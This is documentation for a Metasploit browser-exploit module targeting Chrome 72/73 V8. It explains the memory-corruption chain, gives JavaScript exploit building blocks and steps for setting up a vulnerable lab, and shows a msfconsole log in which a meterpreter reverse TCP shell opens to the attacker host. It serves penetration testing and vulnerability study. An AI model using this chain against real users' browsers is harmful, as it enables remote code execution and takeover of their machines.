GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/browser/chrome_array_map.md

This module exploits an issue in Chrome 73.0.3683.86 (64-bit). The exploit corrupts the length of a float array so that it can read and write past its own backing store, and uses that out-of-bounds access to modify the backing store pointer of a typed array. The typed array then serves as an arbitrary read/write primitive. Finally, the exploit instantiates a WebAssembly module, which makes V8 allocate a region of RWX memory for the compiled function; that region is overwritten with the payload and executed.

The payload runs inside the sandboxed renderer process and the module contains no sandbox escape, so the browser must be started with the --no-sandbox option for the payload to work correctly.
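The paragraph above compresses several separate primitives. As an added example (not the Metasploit module's own code), the snippet below shows two of the reusable building blocks in Node.js-runnable form: the double-to-integer bit reinterpretation that every such exploit needs once it holds a corrupted float array, the decoding of a V8 tagged word read through that array, and a hand-built WebAssembly module whose compiled export is the kind of function whose RWX code page the module later locates and overwrites. The names f2i, i2f, decodeTaggedWord, makeWasmFunction and WASM_BYTES are this example's, not the module's; the tagging layout assumed is that of Chrome 73-era V8 (no pointer compression), and the snippet deliberately reproduces neither the length corruption nor the overwrite of the code page.

```javascript
// Added example (not the Metasploit module's code): building blocks of a
// V8 exploit of this shape, runnable in Node.js.
//   1. Reinterpreting the bits of a JS double as a 64-bit integer and back.
//      A corrupted float array leaks/writes raw 64-bit words, but JS only
//      hands them to you as doubles, so every address passes through here.
//   2. Decoding a word read from an object's element store the way V8 of
//      the Chrome 73 era tags values (assumption: no pointer compression).
//   3. Instantiating a WebAssembly module, which makes V8 JIT-compile the
//      exported function into an RWX code page (assumption: the Node/V8
//      build you run this on behaves the same; the page is not touched).
"use strict";

// One 8-byte buffer viewed as a double and as an unsigned 64-bit integer.
const convBuf = new ArrayBuffer(8);
const convF64 = new Float64Array(convBuf);
const convU64 = new BigUint64Array(convBuf);

// f2i: double -> BigInt with the identical bit pattern.
function f2i(f) {
  convF64[0] = f;
  return convU64[0];
}

// i2f: BigInt (64-bit pattern) -> double carrying those bits.
// Caveat: patterns that encode a NaN may be canonicalised by the engine
// when stored through a float array, so exploits avoid writing such words
// via the float primitive.
function i2f(i) {
  convU64[0] = BigInt.asUintN(64, BigInt(i));
  return convF64[0];
}

// Decode a 64-bit word read out of a JSArray's element store:
// low bit 1 -> HeapObject pointer (address = word - 1),
// low bit 0 -> Smi, the signed 32-bit value held in the upper half.
function decodeTaggedWord(word) {
  const w = BigInt.asUintN(64, BigInt(word));
  if (w & 1n) {
    return { kind: "pointer", value: w - 1n };
  }
  return { kind: "smi", value: BigInt.asIntN(32, w >> 32n) };
}

// Smallest valid wasm module: one exported function `main` returning 42.
// Constructed by hand for this example so it needs no external file.
const WASM_BYTES = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d,                                       // "\0asm"
  0x01, 0x00, 0x00, 0x00,                                       // version 1
  0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,                     // type: () -> i32
  0x03, 0x02, 0x01, 0x00,                                       // func 0 uses type 0
  0x07, 0x08, 0x01, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00,   // export "main"
  0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, 0x2a, 0x0b,               // i32.const 42; end
]);

// Synchronously compile and instantiate. The returned export is the
// JIT-compiled function whose code page the real exploit locates
// (wasm_rwx_addr) and overwrites with shellcode.
function makeWasmFunction() {
  const mod = new WebAssembly.Module(WASM_BYTES);
  const inst = new WebAssembly.Instance(mod, {});
  return inst.exports.main;
}

// Stand-alone demo.
if (typeof require !== "undefined" && require.main === module) {
  console.log("1.0 as bits: 0x" + f2i(1.0).toString(16));
  console.log(decodeTaggedWord(0x0000002a00000000n));
  console.log("wasm main() =", makeWasmFunction()());
}
```

Run it with `node` to see the bit pattern of 1.0, a decoded Smi, and the wasm function returning 42. In a real chain the f2i/i2f pair is applied to every word that crosses the float-array primitive, and decodeTaggedWord is how a leaked element is told apart from a pointer before it is untagged.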

Vulnerable Application

The module is compatible with any 64-bit Google Chrome of version 72 or 73, on any platform (macOS, Linux or Windows); however, the code that writes the shellcode into the RWX region (wasm_rwx_addr) may need to be modified for a given build.

Vulnerable Application Installation Steps

You can download a vulnerable Chrome version from this location: https://www.filepuma.com/download/google_chrome_64bit_73.0.3683.86-21785/

You should ensure that the application does not update itself to the latest version (by disabling automatic updates or simply not connecting it to the internet). You may also need to disable Windows Defender, since it will otherwise interfere with the payload.

Verification Steps

  1. Do: use exploit/multi/browser/chrome_array_map
  2. Do: set payload windows/x64/meterpreter/reverse_tcp
  3. Do: set LHOST [IP]
  4. Do: set SRVHOST [IP]
  5. Do: set URIPATH [PATH] (the scenario below uses /)
  6. Do: run
  7. Browse to http://[SRVHOST]:8080/[PATH] from the vulnerable Chrome started with --no-sandbox and wait for the session

Scenarios

Windows 10 and Google Chrome 73.0.3683.86 with --no-sandbox

Start Google Chrome without a sandbox:

```
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox
```

Then, in msfconsole:

```
msf > use exploit/multi/browser/chrome_array_map
msf exploit(multi/browser/chrome_array_map) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(multi/browser/chrome_array_map) > set URIPATH /
URIPATH => /
msf exploit(multi/browser/chrome_array_map) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/browser/chrome_array_map) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(multi/browser/chrome_array_map) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/browser/chrome_array_map) >
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] 192.168.56.3      chrome_array_map - Sending / to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
[*] Sending stage (206403 bytes) to 192.168.56.3
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.3:49675) at 2020-02-29 15:07:06 +0800
msf exploit(multi/browser/chrome_array_map) > sessions 1
[*] Starting interaction with 1...
meterpreter > pwd
C:\Program Files (x86)\Google\Chrome\Application\73.0.3683.86
meterpreter >
```